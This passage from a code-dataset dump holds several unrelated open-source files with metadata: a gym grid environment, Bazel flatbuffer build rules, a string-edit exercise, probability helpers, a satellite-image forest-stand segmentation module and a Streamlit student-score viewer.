* (self.ncols + 2) + '\\n')\n outstream.write(\"\\n\".join('|%s|' % ''.join(line) for line in desc) + '\\n')\n outstream.write(\"‾\" * (self.ncols + 2) + '\\n\\n')\n # ^possible issue with overline character (Unicode: U+203E)\n\n def _step(self, a):\n \"\"\"\n Receives the agent's action a, determines the opponent's action\n and returns the outcome\n :param a: the action of the agent (an integer)\n :return: tuple(state, reward, done, info)\n \"\"\"\n self.current_state = self.safe_exec(self.current_state, a)\n row, col = self.current_state # just an alias\n\n # retrieves the tile of current coordinates (' ', 'G' or 'H')\n tile = self.world[row][col]\n reward = self.rewards[tile]\n\n # terminal test (goal or hole)\n done = tile in 'GH'\n\n self.last_action = a\n info = {\n \"action_index\": a,\n \"action_name\": self.action_names[a],\n \"tile\": '{}'.format(tile)\n }\n return self.current_state, reward, done, info\n\n def _render(self, mode='human', close=False):\n if close:\n return\n outfile = StringIO() if mode == 
'ansi' else sys.stdout\n\n row, col = self.current_state # self.s // self.ncols, self.s % self.ncols\n desc = self.desc.tolist()\n desc = [[c.decode('utf-8') for c in line] for line in desc]\n desc[row][col] = utils.colorize(desc[row][col], \"red\", highlight=True)\n if self.last_action is not None:\n outfile.write(\" ({})\\n\".format(self.action_names[self.last_action]))\n else:\n outfile.write(\"\\n\")\n outfile.write(\"\\n\".join(''.join(line) for line in desc) + \"\\n\\n\")\n\n if mode != 'human':\n return outfile\n\n def _reset(self):\n self.current_state = self.initial_state()\n self.last_action = None\n return self.current_state\n","repo_name":"andertavares/gym-adversarialgrid","sub_path":"gym_adversarialgrid/envs/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"2045801351","text":"\"\"\"\nRules for building typescript flatbuffers with Bazel.\n\"\"\"\n\nload(\"@aspect_rules_js//js:defs.bzl\", \"js_library\")\nload(\"@aspect_rules_ts//ts:defs.bzl\", \"ts_project\")\nload(\":build_defs.bzl\", \"DEFAULT_INCLUDE_PATHS\", \"flatbuffer_library_public\")\n\nDEFAULT_FLATC_TS_ARGS = [\n \"--gen-object-api\",\n \"--gen-mutable\",\n \"--reflect-names\",\n \"--gen-name-strings\",\n \"--ts-flat-files\",\n \"--keep-prefix\",\n]\n\ndef flatbuffer_ts_library(\n name,\n srcs,\n compatible_with = None,\n target_compatible_with = None,\n deps = [],\n include_paths = DEFAULT_INCLUDE_PATHS,\n flatc_args = DEFAULT_FLATC_TS_ARGS,\n visibility = None,\n restricted_to = None,\n include_reflection = True,\n package_name = None):\n \"\"\"Generates a ts_library rule for a given flatbuffer definition.\n\n Args:\n name: Name of the generated ts_library rule.\n srcs: Source .fbs file(s).\n deps: Other flatbuffer_ts_library's to depend on. Note that currently\n you must specify all your transitive dependencies manually.\n include_paths: Optional, list of paths the includes files can be found in.\n flatc_args: Optional list of additional arguments to pass to flatc\n (e.g. --gen-mutable).\n visibility: The visibility of the generated cc_library. By default, use the\n default visibility of the project.\n compatible_with: Optional, The list of environments this rule can be built\n for, in addition to default-supported environments.\n restricted_to: Optional, The list of environments this rule can be built\n for, instead of default-supported environments.\n target_compatible_with: Optional, The list of target platform constraints\n to use.\n include_reflection: Optional, Whether to depend on the flatbuffer\n reflection library automatically. 
Only really relevant for the\n target that builds the reflection library itself.\n package_name: Optional, Package name to use for the generated code.\n \"\"\"\n srcs_lib = \"%s_srcs\" % (name)\n\n # frc971-specific modification: Add a genrule that overwrites the imports for any flatbuffer\n # types (mostly just for reflection) because they need to point to external/, not to\n # third_party/.\n # TODO(james): There absolutely are better ways to do this, but this was the quick and dirty\n # one....\n outs = [\"%s_generated.ts\" % (s.replace(\".fbs\", \"\").split(\"/\")[-1]) for s in srcs]\n includes = [d + \"_includes\" for d in deps]\n flatbuffer_library_public(\n name = srcs_lib,\n srcs = srcs,\n output_suffix = \"_pregenerated.ts\",\n language_flag = \"--ts\",\n includes = includes,\n include_paths = include_paths,\n flatc_args = flatc_args + [\"--filename-suffix _pregenerated\"],\n compatible_with = compatible_with,\n restricted_to = restricted_to,\n target_compatible_with = target_compatible_with,\n )\n genrule_cmd = \" \".join([\n \"SRCS=($(SRCS));\",\n \"OUTS=($(OUTS));\",\n \"for i in $${!SRCS[@]}; do\",\n \"sed \\\"s/'.*reflection\\\\/reflection_pregenerated/'flatbuffers_reflection\\\\/reflection_generated/\\\" $${SRCS[i]} > $${OUTS[i]};\",\n \"sed -i 's/_pregenerated/_generated/' $${OUTS[i]};\",\n \"done\",\n ])\n native.genrule(\n name = name + \"_reimporter.ts\",\n srcs = [srcs_lib],\n outs = outs,\n cmd = genrule_cmd,\n )\n ts_project(\n name = name + \"_ts\",\n srcs = outs,\n declaration = True,\n visibility = visibility,\n compatible_with = compatible_with,\n restricted_to = restricted_to,\n target_compatible_with = target_compatible_with,\n supports_workers = False,\n tsconfig = {\n \"compilerOptions\": {\n \"declaration\": True,\n \"lib\": [\n \"ES2015\",\n \"ES2020.BigInt\",\n \"DOM\",\n ],\n \"module\": \"es2015\",\n \"moduleResolution\": \"node\",\n \"strict\": True,\n \"types\": [\"node\"],\n },\n },\n deps = deps + [\n \"@//:node_modules/flatbuffers\",\n # TODO(phil): Figure out why @types/node isn't being picked up as a\n # transitivie dependencies.\n \"@//:node_modules/@types/node\",\n ] + ([\"@//:node_modules/flatbuffers_reflection\"] if include_reflection else []),\n )\n js_library(\n name = name,\n visibility = visibility,\n compatible_with = compatible_with,\n restricted_to = restricted_to,\n target_compatible_with = target_compatible_with,\n srcs = [name + \"_ts\"],\n )\n native.filegroup(\n name = \"%s_includes\" % (name),\n srcs = srcs + includes,\n compatible_with = compatible_with,\n restricted_to = restricted_to,\n visibility = visibility,\n )\n","repo_name":"frc971/971-Robot-Code","sub_path":"third_party/flatbuffers/typescript.bzl","file_name":"typescript.bzl","file_ext":"bzl","file_size_in_byte":4944,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"92"} +{"seq_id":"197814394","text":"# One Away: There are three types of edits that can be performed on strings: insert a character,\n# remove a character, or replace a character. Given two strings, write a function to check if they are\n# one edit (or zero edits) away.\n# EXAMPLE\n# pale, ple -> true\n# pales, pale -> true\n# pale, bale -> true\n# pale, bae -> false\n#\n# 1. one_edit_away\n# 2. 
one_away_shaffle1 and one_away_shaffle2 are not exactly what the question asks for, it has the shuffled cases counted in\n#\n\nfrom collections import Counter\n\n\ndef one_edit_away(A, B):\n len_diff = len(A)-len(B)\n if abs(len_diff)>1:\n return False\n if len_diff == 1 :\n return check_remove(A, B)\n elif len_diff == -1:\n return check_insert(A, B)\n else: # 0\n return check_replace(A, B)\n\ndef check_replace(A, B):\n count = 0\n for i in range(len(A)):\n if A[i] != B[i]:\n count += 1\n if count > 1:\n return False\n else:\n return True\n\ndef check_insert(A, B):\n for i in range(len(A)):\n if A[i] != B[i]:\n if A[i:] == B[i+1:]:\n return True\n else:\n return False\n return False\n\ndef check_remove(A, B):\n for i in range(len(A)):\n if A[i] != B[i]:\n if A[i+1:] == B[i:]:\n return True\n else:\n return False\n return False\n\n\n\n# \n# Time Complexitiy: O(N*N)\n# Space Complexity: O(N) ?\ndef one_away_shaffle1(A, B):\n if abs(len(A)-len(B))>1:\n return False\n \n diff = 0\n a = [x for x in A]\n b = [x for x in B]\n\n for x in a:\n if x not in b:\n diff += 1\n if diff > 1:\n return False\n else:\n a.remove(x)\n b.remove(x)\n if abs(len(a)-len(b)) > 1:\n return False\n if abs(len(a)-len(b)) == 1 and a[0] != b[0]:\n return False\n return True\n\n\n# Time Complexitiy: O(N*N)\n# Space Complexity: O(N) ?\ndef one_away_shaffle2(A, B):\n if abs(len(A)-len(B))>1:\n return False\n ca = Counter(A)\n cb = Counter(B)\n dd = {} # diff\n for x in ca:\n if x not in cb:\n dd[x] = ca[x]\n else:\n dd[x] = ca[x] - cb[x]\n for x in cb:\n if x not in ca:\n dd[x] = - cb[x]\n dd_r = {}\n for v, c in dd.items():\n if c == 0:\n continue\n elif abs(c) > 1:\n return False\n else:\n dd_r[v] = c\n print(dd, dd_r)\n if len(dd_r) < 2:\n return True\n if len(dd_r) > 2:\n return False\n # len(dd) == 2\n sum = 0\n for _, c in dd_r.items():\n sum += c\n if sum > 0:\n return False\n return True\n\n\ndef test(A, B):\n #print(A, B, one_edit_away(A,B))\n #print(A, B, one_away_shaffle2(A,B))\n print(A, B, one_edit_away(A, B))\n\n# test one_edit_away\ntest('abcd', 'abcd')\ntest('abcd','abecd')\ntest('abcd','bcd')\ntest('xbcd','abcd')\ntest('abcd','abxd')\ntest('abcd','acbd')\ntest('abcd','abcdef')\ntest('abefcd','abcd')\ntest('abcd','ac')\ntest('abcd', 'bca')\n\n\n# test one_away_shaffle\n# test('abcd', 'bca')\n# test('fbac','acbd')\n# test('aebcd','bdca')\n# test('aebcd','bdc')\n# test('abcd','aoped')\n# test('','')\n\n","repo_name":"icoding2016/study","sub_path":"PY/free_exercise/one_edit_away.py","file_name":"one_edit_away.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"70825774381","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom operator import mul\n\n\ndef PB(k,p):\n from sympy.utilities.iterables import multiset_permutations\n '''\n calculate partitions' probabilities using poisson binomial distribution\n \n input:\n k: #edges existed in one partition\n p: edge probabilities e.g., p=[0.2,0.3,0.1,0.5,0.5,0.8]\n \n output:\n result: probabilities of partitions\n '''\n \n #initialization\n \n result=0\n \n # if no edge in a partition:\n \n if len(p)==0:\n return 1\n \n # calculate sum of possible world probabilities\n\n l_permu=[1] * k + [0] * (len(p) - k)\n\n for perm in multiset_permutations(l_permu):\n\n re=1\n \n # calculate probability of this possible world\n \n for edge_id in range(len(perm)):\n\n if int(perm[edge_id])==1:\n \n re*=p[edge_id]\n else:\n \n re*=(1-p[edge_id])\n result+=re\n\n 
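# For example, PB(1, [0.5, 0.5]) enumerates the two worlds [1, 0] and [0, 1],\n    # each with probability 0.5*0.5 = 0.25, so the sum returned below is 0.5.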
\n return result\n\n\n\n\ndef DFT(k,p):\n import math\n import cmath\n '''\n Approximate the probability of partitions using discrete fourier transform\n \n input:\n k: #edges existed in one partition\n p: edge probabilities e.g., p=[0.2,0.3,0.5,0.6,0.5]\n \n output:\n approximated probabilities of partitions\n '''\n\n n=len(p)\n C=math.e**((2*cmath.sqrt(-1)*math.pi)/(n+1))\n result=0\n \n for l in range(n+1):\n re1=C**(-l*k)\n re2=1\n for m in range(n):\n re2*=(1+(C**l-1)*p[m])\n result+=re1*re2\n return (1/(1+n))*result \n\n","repo_name":"uuinfolab/Expected_Modularity_Calculation_in_ProbabilisticGraph","sub_path":"Probabilities.py","file_name":"Probabilities.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31022505482","text":"import os\nimport numpy as np\n\nimport geopandas as gpd\nimport rasterio\nfrom rasterio.plot import reshape_as_image\nfrom rasterio import features, windows\nfrom affine import Affine\nfrom shapely.geometry import box\nfrom rastachimp import as_shapely, simplify_dp, smooth_chaikin\n\n# pre-processing images\nfrom skimage.color import rgb2hsv\nfrom skimage.color.adapt_rgb import adapt_rgb, each_channel, hsv_value\nfrom skimage.exposure import equalize_adapthist, match_histograms\nfrom skimage import filters\nfrom skimage.restoration import denoise_tv_chambolle\nfrom skimage.transform import downscale_local_mean\nfrom skimage.util import img_as_float\n\n# segmenting images\nimport heapq\nfrom skimage.feature import peak_local_max\nfrom skimage.segmentation import watershed\nfrom skimage.future import graph\nfrom skimage.future.graph.graph_merge import (_revalidate_node_edges,\n _invalidate_edge,\n _rename_node)\n\n\ndef parse_stand_path(path_to_file):\n \"\"\"Parses useful information from the path to a stand delineation layer.\"\"\"\n dirname, basename = os.path.split(path_to_file)\n cell_id = int(basename.split('_')[0])\n year = int(basename.split('_')[-1].split('.')[0])\n agency = basename.split('_')[1]\n\n if 'oregon' in dirname:\n state_name = 'oregon'\n elif 'washington' in dirname:\n state_name = 'washington'\n return dirname, cell_id, state_name, year, agency\n\n\ndef get_naip_path(root_dir, cell_id, state_name, stands_year):\n \"\"\"Fetch path to the NAIP image for a tile nearest to stands_year\"\"\"\n if state_name == 'washington':\n YEARS = np.array([2009, 2011, 2015, 2017])\n elif state_name == 'oregon':\n YEARS = np.array([2009, 2011, 2014, 2016])\n best_year = YEARS[np.argmin(abs(YEARS - stands_year))]\n\n root_dir = (root_dir.replace('interim', 'processed')\n .replace('stands', 'naip'))\n dirname = f'{root_dir}/{best_year}'\n fname = f'{cell_id}_naip_{best_year}.tif'\n path_to_file = os.path.join(dirname, fname)\n return path_to_file\n\n\ndef get_landsat_path(root_dir, cell_id, state_name, stands_year):\n \"\"\"Fetch path to the LANDSAT leaf-on image for a tile nearest to\n stands_year.\n \"\"\"\n if state_name == 'washington':\n YEARS = np.array([2009, 2011, 2015, 2017])\n elif state_name == 'oregon':\n YEARS = np.array([2009, 2011, 2014, 2016])\n best_year = YEARS[np.argmin(abs(YEARS - stands_year))]\n\n root_dir = (root_dir.replace('interim', 'processed')\n .replace('stands', 'landsat'))\n dirname = f'{root_dir}/{best_year}'\n fname = f'{cell_id}_landsat-leaf-on_{best_year}.tif'\n path_to_file = os.path.join(dirname, fname)\n return path_to_file\n\n\ndef load_data(stand_path, chip_size=None, offsets=None):\n \"\"\"Loads NAIP, LANDSAT, and 
stand delineation data\"\"\"\n dirname, cell_id, state_name, year, agency = parse_stand_path(stand_path)\n naip_path = get_naip_path(dirname, cell_id, state_name, year)\n landsat_path = get_landsat_path(dirname, cell_id, state_name, year)\n\n with rasterio.open(naip_path) as src:\n profile = src.profile\n height, width = src.shape\n if chip_size is not None:\n if offsets is not None:\n row_off, col_off = offsets\n else:\n row_off = np.random.randint(0, height-chip_size)\n col_off = np.random.randint(0, width-chip_size)\n window = windows.Window(col_off, row_off, chip_size, chip_size)\n else:\n window = None\n\n naip = reshape_as_image(src.read(window=window))\n if window is not None:\n trf = src.window_transform(window)\n bbox = src.window_bounds(window)\n else:\n trf = src.transform\n bbox = src.bounds\n\n with rasterio.open(landsat_path) as src:\n if chip_size is not None:\n window = windows.from_bounds(*bbox,\n transform=src.transform,\n height=chip_size,\n width=chip_size)\n else:\n window = windows.from_bounds(*bbox,\n transform=src.transform,\n height=height,\n width=width)\n landsat = ((\n reshape_as_image(\n np.stack(\n [src.read(band+1, window=window) for band in range(4)]\n ))/3000).clip(0, 1)*255).astype(np.uint8)\n\n stands = gpd.read_file(stand_path)\n stands = gpd.clip(stands, box(*bbox))\n\n return naip, landsat, profile, trf, stands\n\n\n@adapt_rgb(each_channel)\ndef sobel_each(image, *args, **kwargs):\n return filters.sobel(image, *args, **kwargs)\n\n\n@adapt_rgb(hsv_value)\ndef sobel_hsv(image, *args, **kwargs):\n return filters.sobel(image, *args, **kwargs)\n\n\ndef calc_ndvi(img):\n r, nir = img[:, :, 0] + 1e-9, img[:, :, 3] + 1e-9\n ndvi = (nir - r) / (nir + r)\n return ndvi.clip(-1.0, 1.0)\n\n\ndef transform_image(src_img, transform, match_img=None, ndvi=False,\n enhance_contrast=True, downscale=5, denoise=True):\n \"\"\"Applies some transformations to an image useful before segmentation.\"\"\"\n if ndvi:\n img, multichannel = calc_ndvi(src_img), False\n if match_img is not None:\n match_img = calc_ndvi(match_img)\n else:\n img, multichannel = img_as_float(src_img[:, :, 0:3]), True\n if match_img is not None:\n match_img = img_as_float(match_img[:, :, 0:3])\n\n if match_img is not None:\n img = match_histograms(img, match_img, multichannel=multichannel)\n\n if enhance_contrast:\n img = equalize_adapthist(img)\n\n if downscale is not None:\n factors = (downscale, downscale, 1) if multichannel else \\\n (downscale, downscale)\n img = downscale_local_mean(img, factors=factors)\n a, b, c, d, e, f, _, _, _ = transform\n trf = Affine(downscale, b, c, d, -downscale, f)\n\n if denoise:\n img = denoise_tv_chambolle(img, multichannel=multichannel)\n\n return img, trf\n\n\ndef oversegment(image, min_distance, downscale, multichannel=False):\n \"\"\"Oversegments an image using watershed segmentation on image gradient.\"\"\"\n if multichannel:\n grad = sobel_hsv(rgb2hsv(image), mode='reflect').max(axis=-1)\n else:\n grad = filters.sobel(image, mode='reflect')\n\n pixel_dist = max(min_distance//downscale, 1)\n peaks = peak_local_max(-grad, min_distance=pixel_dist,\n indices=False, exclude_border=0)\n markers = (peaks.ravel() * peaks.ravel().cumsum()).reshape(*grad.shape)\n basins = watershed(grad, markers=markers)\n\n return basins\n\n\ndef scrm(image, labels, dms, mmu, mas, downscale):\n \"\"\"Applies Size-Constrained Region Merging.\n\n Parameters\n ----------\n image : arr\n image being segmented\n labels : arr\n initial (oversegmented) regions\n dms : int\n desired mean size of 
merged regions, in acres\n mas : int\n maximum allowed size of merged regions, in acres\n mmu : int\n minimum mappable unit, in acres\n\n Returns\n -------\n regions : arr\n array of same shape as image, with each distinct region indicated by\n increasing integer values\n \"\"\"\n dms_pixels = 4047 * dms / (downscale*downscale)\n mas_pixels = 4047 * mas / (downscale*downscale)\n mmu_pixels = 4047 * mmu / (downscale*downscale)\n\n rag = graph.rag_mean_color(image, labels)\n regions = merge_size_constrained(labels, rag,\n dms_pixels, mas_pixels, mmu_pixels,\n rag_copy=False, in_place_merge=True,\n merge_func=merge_scrm,\n weight_func=weight_scrm,\n ).astype(np.int16)\n\n return regions\n\n\ndef vectorize(regions, transform, crs, simp_dist=5, smooth=True):\n \"\"\"Vectorizes boundaries of regions in a labeled image.\"\"\"\n # vectorize regions to GeoJSON\n shapes = features.shapes(regions, transform=transform)\n # buffer each polygon geometry by 0 to resolve topological errors\n shapes = [(x[0].buffer(0), x[1]) for x in as_shapely(shapes)]\n # simplify boundaries using Douglas-Peucker algorithm\n if simp_dist is not None:\n shapes = simplify_dp(shapes, distance=simp_dist)\n # smooth boundaries using Chaikin corner cutting algorithm\n if smooth:\n shapes = smooth_chaikin(shapes, keep_border=True)\n # convert to a GeoDataFrame\n gdf = gpd.GeoDataFrame(shapes, columns=['geometry', 'stand_id'], crs=crs)\n\n return gdf\n\n\ndef run_segmentation(path_to_stands, chip_size=None, downscale=5, ndvi=False,\n min_marker_distance=10, dms=10, mmu=1, mas=30,\n simp_dist=10):\n data = load_data(path_to_stands, chip_size=chip_size)\n naip, landsat, profile, full_trf, obs_stands = data\n\n img, down_trf, = transform_image(naip, full_trf, match_img=landsat,\n ndvi=ndvi, downscale=downscale)\n\n basins = oversegment(img, min_distance=min_marker_distance,\n downscale=downscale,\n multichannel=~ndvi)\n\n regions = scrm(img, basins, dms=dms, mmu=mmu, mas=mas, downscale=downscale)\n\n pred_stands = vectorize(regions, down_trf,\n crs=profile['crs'],\n simp_dist=simp_dist)\n\n return obs_stands, pred_stands, naip, full_trf\n\n\ndef merge_size_constrained(labels, rag, dms, mas, mmu,\n rag_copy, in_place_merge,\n merge_func, weight_func):\n \"\"\"Perform Size-Constrained Region Merging on a RAG.\n\n Parameters\n ----------\n labels : ndarray\n The array of labels.\n rag : RAG\n The Region Adjacency Graph.\n dms : int\n Desired Mean Size of regions, in pixels.\n mas : int\n Maximum Allowed Size of regions, in pixels. Note: Not a hard cap.\n mmu : int\n Minimum Mappable Unit, minimum size of regions, in pixels.\n rag_copy : bool\n If set, the RAG copied before modifying.\n in_place_merge : bool\n If set, the nodes are merged in place. Otherwise, a new node is\n created for each merge..\n merge_func : callable\n This function is called before merging two nodes. For the RAG `graph`\n while merging `src` and `dst`, it is called as follows\n ``merge_func(graph, src, dst)``.\n weight_func : callable\n The function to compute the new weights of the nodes adjacent to the\n merged node. 
This is directly supplied as the argument `weight_func`\n to `merge_nodes`.\n Returns\n -------\n out : ndarray\n The new labeled array.\n \"\"\"\n if rag_copy:\n rag = rag.copy()\n\n edge_heap = []\n\n # a couple attributes we'll track to enforce a partial stopping criterion\n rag.graph.update({\n 'num_ge_mmu': 0, # number of regions >= mmu size\n 'area_lt_mmu': 0, # total area in regions smaller than mmu size\n })\n\n total_area = 0 # total area in regions/image\n\n for n in rag:\n area = rag.nodes[n]['pixel count']\n total_area += area\n if area < mmu:\n rag.graph['area_lt_mmu'] += area\n else:\n rag.graph['num_ge_mmu'] += 1\n\n exp_final_num = total_area // dms # expected number of regions\n\n for n1, n2, data in rag.edges(data=True):\n # Push a valid edge in the heap\n wt = data['weight']\n heap_item = [wt, n1, n2, True]\n heapq.heappush(edge_heap, heap_item)\n\n # Reference to the heap item in the graph\n data['heap item'] = heap_item\n\n partial_stop = False\n while len(edge_heap) > 0:\n _, n1, n2, valid = heapq.heappop(edge_heap)\n\n num_ge_mmu = rag.graph['num_ge_mmu']\n area_lt_mmu = rag.graph['area_lt_mmu']\n if ((num_ge_mmu + (area_lt_mmu/dms)) < exp_final_num) and \\\n not partial_stop:\n partial_stop = True\n\n # if the best fitting pair consists of two regions both exceeding MAS,\n # then it is not allowed to merge\n\n # The merging continues this way until the sum of (a) the number of\n # regions currently larger than the minimum allowed size MMU, plus (b)\n # the expected number of final regions that may result from the area\n # currently occupied by regions smaller than MMU, is less than the\n # expected number of final regions (i.e., the image area divided by\n # DMS).\n\n # Thereafter, the candidate list is restricted only to those pairs\n # where at least one of both regions is smaller than MMU.\n\n if valid:\n n1_area = rag.nodes[n1]['pixel count']\n n2_area = rag.nodes[n2]['pixel count']\n if n1_area > mas and n2_area > mas:\n valid = False\n if n1_area > mas and n2_area > mmu:\n valid = False\n if n1_area > mmu and n2_area > mas:\n valid = False\n if partial_stop:\n if n1_area >= mmu and n2_area >= mmu:\n valid = False\n\n # Ensure popped edge is valid, if not, the edge is discarded\n if valid:\n # Invalidate all neigbors of `src` before its deleted\n for nbr in rag.neighbors(n1):\n _invalidate_edge(rag, n1, nbr)\n\n for nbr in rag.neighbors(n2):\n _invalidate_edge(rag, n2, nbr)\n\n if not in_place_merge:\n next_id = rag.next_id()\n _rename_node(rag, n2, next_id)\n src, dst = n1, next_id\n else:\n src, dst = n1, n2\n\n merge_func(rag, src, dst, mmu)\n new_id = rag.merge_nodes(src, dst, weight_func)\n _revalidate_node_edges(rag, new_id, edge_heap)\n\n label_map = np.arange(labels.max() + 1)\n for ix, (n, d) in enumerate(rag.nodes(data=True)):\n for label in d['labels']:\n label_map[label] = ix\n\n return label_map[labels]\n\n\ndef weight_scrm(graph, src, dst, n):\n \"\"\"Callback to handle merging nodes by recomputing mean color.\n\n The method expects that the mean color of `dst` is already computed.\n\n Parameters\n ----------\n graph : RAG\n The graph under consideration.\n src, dst : int\n The vertices in `graph` to be merged.\n n : int\n A neighbor of `src` or `dst` or both.\n\n Returns\n -------\n data : dict\n A dictionary with the `\"weight\"` attribute set as the absolute\n difference of the mean color between node `dst` and `n`.\n \"\"\"\n\n diff = graph.nodes[dst]['mean color'] - graph.nodes[n]['mean color']\n diff = np.linalg.norm(diff)\n\n return 
{'weight': diff}\n\n\ndef merge_scrm(graph, src, dst, mmu):\n \"\"\"Callback called before merging two nodes of a mean color distance graph.\n\n This method computes the mean color of `dst`.\n\n Parameters\n ----------\n graph : RAG\n The graph under consideration.\n src, dst : int\n The vertices in `graph` to be merged.\n \"\"\"\n src_area = graph.nodes[src]['pixel count']\n dst_area = graph.nodes[dst]['pixel count']\n\n graph.nodes[dst]['total color'] += graph.nodes[src]['total color']\n graph.nodes[dst]['pixel count'] += graph.nodes[src]['pixel count']\n graph.nodes[dst]['mean color'] = graph.nodes[dst]['total color'] /\\\n graph.nodes[dst]['pixel count']\n\n new_area = graph.nodes[dst]['pixel count']\n\n d_num_ge_mmu = (new_area >= mmu) - (src_area >= mmu) - (dst_area >= mmu)\n\n d_area_lt_mmu = (new_area < mmu)*new_area - \\\n (src_area < mmu)*src_area - \\\n (dst_area < mmu)*dst_area\n\n graph.graph['num_ge_mmu'] += d_num_ge_mmu\n graph.graph['area_lt_mmu'] += d_area_lt_mmu\n","repo_name":"d-diaz/stand_mapping","sub_path":"stand_mapping/models/scrm.py","file_name":"scrm.py","file_ext":"py","file_size_in_byte":15972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"924046977","text":"def main():\n n = int(input('Número: '))\n divisores = 0\n aux = n - 1\n while aux > 0:\n if n % aux == 0:\n divisores += aux\n aux -= 1\n if divisores == n:\n print('Perfeito')\n else:\n print('Não é perfeito')\n\n\nif __name__ == '__main__':\n main()","repo_name":"rogeriosilva-ifpi/ads-i-algoritmos-2018","sub_path":"AtividadeO/Alunos/Atividade_O_ElcyJames/perfeito.py","file_name":"perfeito.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"74086870059","text":"#Victor Villacorta \r\nfrom __future__ import print_function\r\nnoVacio=0\r\nwhile noVacio==0:\r\n lin=raw_input()\r\n if len(lin)>0 and lin.isspace()==False:\r\n noVacio=1\r\n \r\nTEXTO1=lin.split(\" \")\r\nTEXTO2=[] \r\nrastreo=0 \r\nx=0 \r\nfor i in TEXTO1:\r\n try:\r\n TEXTO2.append(int(i))\r\n TEXTO1[x]=int(i)\r\n rastreo+=1\r\n x+=1\r\n except ValueError: \r\n if i.islower():\r\n TEXTO2.append(i)\r\n x+=1\r\n \r\nTEXTO2.sort() \r\nORDEN=[]\r\ns=0\r\nt=rastreo\r\nfor j in TEXTO1:\r\n if isinstance(j,int):\r\n ORDEN.append(str(TEXTO2[s]))\r\n s=s+1\r\n elif isinstance(j,str):\r\n if j.islower():\r\n ORDEN.append(TEXTO2[t])\r\n t=t+1\r\n\r\nfor i in ORDEN:\r\n print(i, end=' ')\r\n\r\nraw_input(\"\\n\\n\\nPRESS ENTER TO EXIT....\")\r\n","repo_name":"kendalvictor/codeando","sub_path":"winner/VillacortaOrden.py","file_name":"VillacortaOrden.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"4337191775","text":"import streamlit as st\nimport sqlite3\nimport pandas as pd\nfrom student_name02 import load_student_names\nfrom PIL import Image\n\ndef union(conn):\n cursor = conn.cursor()\n sql_query = '''\n WITH CombinedScores AS (\n SELECT\n A.studentName, A.studentID, B.courseName, A.assignmentID AS Tutorial, A.answerScore AS Score1, 0 AS Score2, 0 AS Score3\n FROM\n aes_student_answer_score AS A, aes_course AS B\n WHERE\n (A.courseID = B.courseID) AND (A.assignmentID = 1) \n UNION\n SELECT\n A.studentName, A.studentID, B.courseName, A.assignmentID AS Tutorial, 0 AS Score1, A.answerScore AS Score2, 0 AS Score3\n FROM\n aes_student_answer_score AS A, aes_course AS B\n WHERE\n (A.courseID 
= B.courseID) AND (A.assignmentID = 2) \n    UNION\n    SELECT\n        A.studentName, A.studentID, B.courseName, A.assignmentID AS Tutorial, 0 AS Score1, 0 AS Score2, A.answerScore AS Score3\n    FROM\n        aes_student_answer_score AS A, aes_course AS B\n    WHERE\n        (A.courseID = B.courseID) AND (A.assignmentID = 3) \n    )\n    SELECT\n        studentName,\n        studentID,\n        courseName,\n        Tutorial,\n        Score1,\n        Score2,\n        Score3,\n        (Score1 + Score2 + Score3) AS TotalScore\n    FROM\n        CombinedScores;\n    '''\n\n    cursor.execute(sql_query)\n    result = cursor.fetchall()\n    column_names = [desc[0] for desc in cursor.description]\n    df_course = pd.DataFrame(result, columns=column_names)\n\n    cursor.close()\n    conn.close()\n\n    return df_course\n\ndef filter_dataframe(df):\n    \"\"\"\n    Adds a UI on top of a dataframe to let viewers filter columns\n\n    Args:\n        df (pd.DataFrame): Original dataframe\n\n    Returns:\n        pd.DataFrame: Filtered dataframe\n    \"\"\"\n    # dtype helpers used by the checks below\n    from pandas.api.types import is_categorical_dtype, is_datetime64_any_dtype, is_numeric_dtype, is_object_dtype\n\n    modify = st.checkbox(\"Checklist for Activated Filter\", value=True)\n\n    if not modify:\n        return df\n\n    df = df.copy()\n\n    # Try to convert datetimes into a standard format (datetime, no timezone)\n    for col in df[['courseName', 'Tutorial']].columns:\n        if is_object_dtype(df[col]):\n            try:\n                df[col] = pd.to_datetime(df[col])\n            except Exception:\n                pass\n\n        if is_datetime64_any_dtype(df[col]):\n            df[col] = df[col].dt.tz_localize(None)\n\n    modification_container = st.container()\n    # print(df[['Courses', 'Assignment']].columns)\n    with modification_container:\n        to_filter_columns = st.multiselect(\"Filter data\", df[['courseName', 'Tutorial']].columns)\n        for column in to_filter_columns:\n            left, right = st.columns((14, 1))\n            # Treat columns with < 10 unique values as categorical\n            if is_categorical_dtype(df[column]) or df[column].nunique() < 10:\n                user_cat_input = left.multiselect(\n                    f\"Select to {column}\",\n                    df[column].unique(),\n                    default=[]\n                    # list(df[column].unique()),\n                )\n                df = df[df[column].isin(user_cat_input)]\n            elif is_numeric_dtype(df[column]):\n                _min = float(df[column].min())\n                _max = float(df[column].max())\n                step = (_max - _min) / 100\n                user_num_input = left.slider(\n                    f\"Select to {column}\",\n                    min_value=_min,\n                    max_value=_max,\n                    value=(_min, _max),\n                    step=step,\n                )\n                df = df[df[column].between(*user_num_input)]\n            elif is_datetime64_any_dtype(df[column]):\n                user_date_input = left.date_input(\n                    f\"Select to {column}\",\n                    value=(\n                        df[column].min(),\n                        df[column].max(),\n                    ),\n                )\n                if len(user_date_input) == 2:\n                    user_date_input = tuple(map(pd.to_datetime, user_date_input))\n                    start_date, end_date = user_date_input\n                    df = df.loc[df[column].between(start_date, end_date)]\n            else:\n                user_text_input = left.text_input(\n                    f\"Substring or regex in {column}\",\n                )\n                if user_text_input:\n                    df = df[df[column].astype(str).str.contains(user_text_input)]\n\n    return 